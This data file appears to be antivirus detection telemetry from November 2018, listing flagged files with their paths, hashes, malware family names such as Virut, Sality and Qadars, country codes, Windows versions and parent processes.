  Row(detection=Row(filename='crmnmhkp.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CRmnMHKP.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yxagrwvf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YXAGRWVF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wqjcxmsf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\WqjcxmsF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='llksidqr.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\LlkSIDqR.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ixmihhpw.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IXmihhPw.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tnhfwsrw.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\TNhFwsrw.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cxwoxfdi.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CXWOxFDI.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccdixgqn.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CcdixGqN.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reclmxky.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\RecLmXkY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cqdhxphb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\cqDhxPhb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qnkqnyas.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qNkqnyas.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='puhxioxe.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\puHXioxE.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='bb711e346d631cec6e4f4581eff9ae4cfbe3a29d9eb3260e9c94c2bf565112be', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:31:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-035241-e83c07be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_148ec154\\AVSCAN-20181101-035048-DA7D9C50\\AVSCAN-20181101-035241-E83C07BE', filesize=192000, name='ADWARE/EoRezo.Gen7.#M1.#R1'), hash='bbd9eb1b66ebcda11999124ea6c2cd258ca5f02ede53eaf819963d9da6d398f9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shareitlenovosupport_3.2.0.526.exe', filepath='C:\\CCAV\\21\\Device\\HarddiskVolume3\\MINECRAFT PE\\SHAREitLENOVOSUPPORT_3.2.0.526.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='bbdf2b390abb97d5bf4b22a885d68c4f455625a45498608dc9d922db929f70e9', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:53:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ffprobe.exe', filepath='C:\\Creative Destruction\\ffmpeg_bin\\ffprobe.exe', filesize=37228000, name='W32/Sality.AT.#M1.#R1'), hash='bbfc41f3a9ceb0da7d935819441280e81b286129e177a1ca70b115dae47970fe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:j+Bkrm2+y0mz2guX.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:48:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbpsv.exe', filepath='E:\\gbpsv.exe', filesize=3968000, name='TR/Banker.D.7539712.#M1.#R1'), hash='bbfdfb74207c8cf9f0b50dd09e872b20189db4acd59cc3f191907592df5fe95b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbpsv.exe', filepath='E:\\gbpsv.exe', filesize=3968000, name='TR/Banker.D.7539712.#M1.#R1'), hash='bbfdfb74207c8cf9f0b50dd09e872b20189db4acd59cc3f191907592df5fe95b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='getdiskserial.exe', filepath='K:\\HBCD\\Programs\\GETDISKSERIAL.EXE', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190257-dab9fd69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190257-DAB9FD69', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000a73e', filepath='C:\\Windows\\Temp\\10b3fca6-3fe9-4555-8847-c80a2fdb4986\\tmp0000041e\\tmp0000a73e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='bc1d966a398900866da1a0dbfcabd3ec6bce1f5e35a35253b7d0041c2f759c1f', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.889.11556\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:07:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='bc24a522134e73615689ec699c2f3069f94bc611a5c39eff66d2511f09177587', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dynasty.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\Zumma4\\Dynasty.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='bc473357ac8f229a05cb3231ceebcc70d23cf3fc5d23704c9f2c51f04ecd6a3d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b5tclient.exe', filepath='C:\\Users\\X\\AppData\\Local\\B5T\\6.0.5.7\\B5TClient.exe', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:57:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BC88EDE548E518B9EC21A4C08C9E22585854D33140901AFADD69A5584A4BE9D4', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-222048-eb13278e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b7aa013\\AVSCAN-20181031-221818-D17EF57C\\AVSCAN-20181031-222048-EB13278E', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='bcab7c74b26935b6fabadd0c116714eacacba5cd9921c71ec255ec6a9dc00f7f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baixaki_psafe-total_vlxczc.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_psafe-total_VlXCzC.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='bcab7c74b26935b6fabadd0c116714eacacba5cd9921c71ec255ec6a9dc00f7f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T00:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wdm.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\Audio\\WDM\\WDM.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='bcb122bf7fe46768bbfbb62c91c2d67de44eb5875545df06c4f2789b45687650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc3555eefbf65872e526e7e8f2dc64b978d243a1617b85544c3c15183278e2e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ikwgSJNfZ0i3E+R2.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='E:\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcd73457116984953123e8b52cafeed9590b7abee1e72e4e9bad0a6d601c0e66', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZqvQCDdw1Uq6w+Sx.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195532-ffcf18de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_472c3e3d\\AVSCAN-20181101-195507-FD0A90AC\\AVSCAN-20181101-195532-FFCF18DE', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Cybereason\\RansomFree\\CybereasonRansomFreeServiceHost.exe', parentsize=13824, timestamp='2018-11-01T23:54:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Cybereason\\RansomFree\\CybereasonRansomFreeServiceHost.exe', parentsize=13824, timestamp='2018-11-01T23:54:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144619-315ca66d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_126cde34\\AVSCAN-20181101-144411-15BA419C\\AVSCAN-20181101-144619-315CA66D', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:43:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103435-13151e6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103435-13151E6B', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094125-30cddcd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48050d0a\\AVSCAN-20181101-094108-2EA412EE\\AVSCAN-20181101-094125-30CDDCD5', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BDCDC74EA2EB6A78EC473352D02B22104AA68A75D38C710D8CEFA70DA05E0431', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BDD1E6CE49412A68DD6A913C0FFCBA1FDE42CB1F0F5E2921F60B0076324A656A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0040210.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0040210.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0059196.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0059196.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053162.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0053162.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0048189.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0048189.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lol.launcher.exe', filepath='e:\\league of legends\\lol.launcher.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0330985.exe', filepath='e:\\system volume information\\_restore{64f1701b-39b4-4c9e-b329-c1179e2aa913}\\rp65\\A0330985.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='outside caller 08-26-2016 71246.zip', filepath='Outside Caller 08-26-2016 71246.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='bdfcb582e5143b086f81aa8090978db555d21c43ac82fcc5b74ef2cf69f6947d', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:50:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be23b9a8e570b749f8036a57b35c87192a66b6dda3717f763c29a491b5a26768', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\BE23B9A8E570B749F8036A57B35C87192A66B6DDA3717F763C29A491B5A26768', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='be23b9a8e570b749f8036a57b35c87192a66b6dda3717f763c29a491b5a26768', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\USB__Data\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T01:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0016814.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{4BC09F2B-3D9F-48B4-B911-965A060CD3E4}\\RP16\\A0016814.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='be3f5d77e6635fdc86a8179f5640fcc127ab946009115fd21138b3184de73d90', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0016443.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{4BC09F2B-3D9F-48B4-B911-965A060CD3E4}\\RP16\\A0016443.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='be3f5d77e6635fdc86a8179f5640fcc127ab946009115fd21138b3184de73d90', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='be4005c3715a02ad1004b49b450292a2876ca917bbc77f22151d51d2e59d2d95', metadata=Row(cmdline='-k secsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='D:\\developement\\Cristal Report 8.5_www.firdaustech.com\\Cristal Report 8.5_www.firdaustech.com\\Cristal Report 8.5\\redist\\it\\mdac_typ.exe', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='be424549f84f209e6bda58ccbc28f122f4626db18737fc01cae247069d797e2c', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T01:45:21Z'), dt=datetime.date(2018, 11, 1)),
